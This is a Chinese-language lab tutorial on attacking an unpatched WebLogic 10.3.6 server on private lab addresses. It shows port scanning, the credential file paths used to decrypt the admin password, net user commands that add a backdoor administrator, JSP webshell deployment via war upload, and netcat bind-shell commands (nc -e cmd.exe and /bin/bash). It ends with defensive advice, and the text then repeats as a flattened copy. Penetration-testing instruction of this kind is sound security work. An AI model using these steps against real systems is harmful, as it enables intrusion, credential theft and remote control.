WebLogic渗透测试实战教学文档

1. 实验环境准备

1.1 系统配置

攻击机: Windows 10 (IP: 192.168.2.104)
靶机1: Linux Ubuntu (IP: 192.168.2.109)
靶机2: Windows Server 2008 R2 64位 (IP: 192.168.2.111)

1.2 WebLogic版本

WebLogic 10.3.6 (未打补丁，未禁用T3协议)

2. 服务发现阶段

2.1 端口扫描方法

Python自定义扫描器
- 基于socket模块实现
- 发送数据包并检测响应判断端口状态
- 多线程实现快速扫描
Nmap扫描
- 更可靠的端口检测方式
- 命令示例: nmap -p 7001 192.168.2.109

2.2 WebLogic常见端口

默认管理控制台端口: 7001
T3协议端口: 7001

3. WebLogic渗透思路

3.1 常见攻击向量

后台弱口令爆破
- 密码采用Base64编码
- 可使用BurpSuite增加编码参数爆破
- 或使用专用爆破工具
T3协议反序列化漏洞
- 直接执行系统命令
- 适用于未打补丁的WebLogic版本
war包部署
- 通过控制台上传恶意war包
- 获取webshell权限

4. 渗透实施步骤

4.1 反序列化漏洞利用

工具选择
- 使用专用反序列化利用工具
- 执行系统命令检测环境
Windows靶机利用
- 执行命令查看系统信息
- 检查开放端口(如3389)
权限提升
- 添加用户: net user username password /add
- 提升权限: net localgroup administrators username /add

4.2 控制台密码破解

4.2.1 获取必要文件

密钥文件路径
- C:\Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat
密码文件路径
- C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties

4.2.2 破解工具准备

工具下载
- WebLogicPasswordDecryptor: GitHub链接
- Bouncy Castle插件: 下载链接
环境配置
- 将插件复制到JDK目录: C:\Program Files\Java\jdk1.8.0_201\jre\lib\ext
- 确保java和javac版本一致

执行破解

javac WebLogicPasswordDecryptor.java
java WebLogicPasswordDecryptor

4.3 war包部署攻击

4.3.1 制作war包

准备JSP大马文件
压缩为ZIP格式
重命名为.war后缀

4.3.2 部署流程

登录控制台: http://192.168.2.109:7001/console
使用破解的凭据登录(示例: weblogic/weblogic123)
选择"部署"选项
上传war包
激活更改并启动部署

4.3.3 访问webshell

示例URL: http://192.168.2.109:7001/cmd/cmd.jsp

5. 反弹Shell技术

5.1 Windows靶机

靶机执行:
```
nc.exe -l -p 8888 -t -e cmd.exe
```
攻击机执行:
```
nc.exe -nvv 192.168.2.111 8888
```

5.2 Linux靶机

安装传统netcat:

sudo apt-get -y install netcat-traditional
sudo update-alternatives --config nc

靶机执行:
```
nc -vlp 8888 -e /bin/bash
```
攻击机执行:
```
nc.exe 192.168.2.109 8888
```

6. 横向渗透建议

代理工具
- 使用Proxifier进行正向代理
- 建立内网跳板
信息收集
- 扫描内网其他主机
- 收集凭证和敏感信息

7. 防御建议

及时更新补丁
- 修复已知反序列化漏洞
- 禁用不必要的协议
强化认证
- 避免使用弱口令
- 启用多因素认证
访问控制
- 限制管理控制台访问IP
- 最小化部署权限
监控措施
- 监控异常部署行为
- 记录管理操作日志

8. 工具资源

密码破解工具: WebLogicPasswordDecryptor
爆破脚本: weblogic.py
Bouncy Castle插件: 下载链接

注意：本文所述技术仅限合法授权测试使用，未经授权进行渗透测试属于违法行为。

WebLogic渗透测试实战教学文档 1. 实验环境准备 1.1 系统配置攻击机 : Windows 10 (IP: 192.168.2.104) 靶机1 : Linux Ubuntu (IP: 192.168.2.109) 靶机2 : Windows Server 2008 R2 64位 (IP: 192.168.2.111) 1.2 WebLogic版本 WebLogic 10.3.6 (未打补丁，未禁用T3协议) 2. 服务发现阶段 2.1 端口扫描方法 Python自定义扫描器基于socket模块实现发送数据包并检测响应判断端口状态多线程实现快速扫描 Nmap扫描更可靠的端口检测方式命令示例: nmap -p 7001 192.168.2.109 2.2 WebLogic常见端口默认管理控制台端口: 7001 T3协议端口: 7001 3. WebLogic渗透思路 3.1 常见攻击向量后台弱口令爆破密码采用Base64编码可使用BurpSuite增加编码参数爆破或使用专用爆破工具 T3协议反序列化漏洞直接执行系统命令适用于未打补丁的WebLogic版本 war包部署通过控制台上传恶意war包获取webshell权限 4. 渗透实施步骤 4.1 反序列化漏洞利用工具选择使用专用反序列化利用工具执行系统命令检测环境 Windows靶机利用执行命令查看系统信息检查开放端口(如3389) 权限提升添加用户: net user username password /add 提升权限: net localgroup administrators username /add 4.2 控制台密码破解 4.2.1 获取必要文件密钥文件路径 C:\Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat 密码文件路径 C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties 4.2.2 破解工具准备工具下载 WebLogicPasswordDecryptor: GitHub链接 Bouncy Castle插件: 下载链接环境配置将插件复制到JDK目录: C:\Program Files\Java\jdk1.8.0_201\jre\lib\ext 确保java和javac版本一致执行破解 4.3 war包部署攻击 4.3.1 制作war包准备JSP大马文件压缩为ZIP格式重命名为.war后缀 4.3.2 部署流程登录控制台: http://192.168.2.109:7001/console 使用破解的凭据登录(示例: weblogic/weblogic123) 选择"部署"选项上传war包激活更改并启动部署 4.3.3 访问webshell 示例URL: http://192.168.2.109:7001/cmd/cmd.jsp 5. 反弹Shell技术 5.1 Windows靶机靶机执行 : 攻击机执行 : 5.2 Linux靶机安装传统netcat : 靶机执行 : 攻击机执行 : 6. 横向渗透建议代理工具使用Proxifier进行正向代理建立内网跳板信息收集扫描内网其他主机收集凭证和敏感信息 7. 防御建议及时更新补丁修复已知反序列化漏洞禁用不必要的协议强化认证避免使用弱口令启用多因素认证访问控制限制管理控制台访问IP 最小化部署权限监控措施监控异常部署行为记录管理操作日志 8. 工具资源密码破解工具 : WebLogicPasswordDecryptor 爆破脚本 : weblogic.py Bouncy Castle插件 : 下载链接注意：本文所述技术仅限合法授权测试使用，未经授权进行渗透测试属于违法行为。